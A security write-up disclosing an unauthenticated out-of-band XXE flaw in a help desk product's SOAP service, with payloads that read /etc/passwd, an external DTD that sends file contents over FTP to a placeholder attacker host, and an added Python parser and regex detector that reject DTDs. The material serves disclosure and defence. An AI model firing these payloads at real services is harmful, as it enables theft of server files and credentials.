SOAP-Based Unauthenticated Out-of-Band XML External Entity (OOB-XXE) in a Help Desk Software



While registering for the application, the assessment team identified a WSDL file at:


/services/ApiService?wsdl


We used the Wsdler Burp extension (https://portswigger.net/bappstore/594a49bb233748f2bc80a9eb18a2e08f) to parse the WSDL file, as shown in the image below:



We then sent the generated request to Repeater and started fuzzing it for XXE, beginning with a classic XXE payload:



<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<data>&file;</data>



[Screenshot: response for file /etc/passwd]

[Screenshot: response for file /etc/shadow]

The two responses above confirm that the vulnerability exists, but with this in-band payload we can only tell whether a file exists on the server; its content is not returned in the response.


To extract the content of a file, we need an out-of-band channel: an emulated FTP server that receives the data.


We set up an xxe.dtd file on our server with the following content:



<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">


Download and run the emulated FTP server from the following link (make sure it listens on the port used in the DTD):



Final XXE payload:

<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>

As soon as the vulnerable request is sent, the content of /etc/passwd starts arriving at the emulated FTP server, as shown in the screenshot below:



[Screenshot: content of /etc/passwd received on the emulated FTP server]
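From the defender's side, here is an added example (not code from the original write-up or from the affected product) that pre-screens SOAP request bodies for the DTD constructs used above and then parses them with Python's standard-library expat in a mode that refuses any DOCTYPE or external entity reference. The sample bodies are the two payload shapes from this post plus a constructed benign envelope.

```python
import re
import xml.parsers.expat as expat
# Constructed sample request bodies: the two payload shapes from the write-up
# (hosts/paths as they appear there) plus a benign SOAP envelope.
CLASSIC_XXE = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<data>&file;</data>"""
OOB_XXE = ('<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>'
           '<sessionId>&rrr;</sessionId>')
BENIGN_SOAP = """<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body><sessionId>abc123</sessionId></soapenv:Body>
</soapenv:Envelope>"""

# Request-level indicators for logging/alerting. A SOAP API has no legitimate use
# for an inline DTD, so a DOCTYPE alone is reason to reject; the other patterns
# tell the analyst which variant (external entity, parameter-entity/OOB) it is.
_INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE", re.I),
    "external_entity": re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    "parameter_entity_ref": re.compile(r"%\w+;"),
}
def xxe_indicators(body):
    """Names of the XXE indicators present in an XML request body."""
    return [name for name, rx in _INDICATORS.items() if rx.search(body)]
class DtdRejected(ValueError):
    """Raised when the hardened parser meets a DOCTYPE or external entity."""
def parse_without_dtd(body):
    """Parse with expat, refusing DOCTYPE/external entities; returns element names seen."""
    parser = expat.ParserCreate()
    # Never fetch external parameter entities (the %asd; step of the OOB chain).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    seen = []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE %r not allowed" % name)
    def on_external_ref(context, base, sysid, pubid):
        raise DtdRejected("external entity %r not allowed" % sysid)
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(body, True)  # exceptions raised in handlers propagate from here
    return seen
def is_rejected(body):
    """True when the hardened parser refuses the body."""
    try:
        parse_without_dtd(body)
    except DtdRejected:
        return True
    return False
```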

References:


http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html?m=1
https://gist.github.com/staaldraad/01415b990939494879b4

© 2020 by SECMASTERS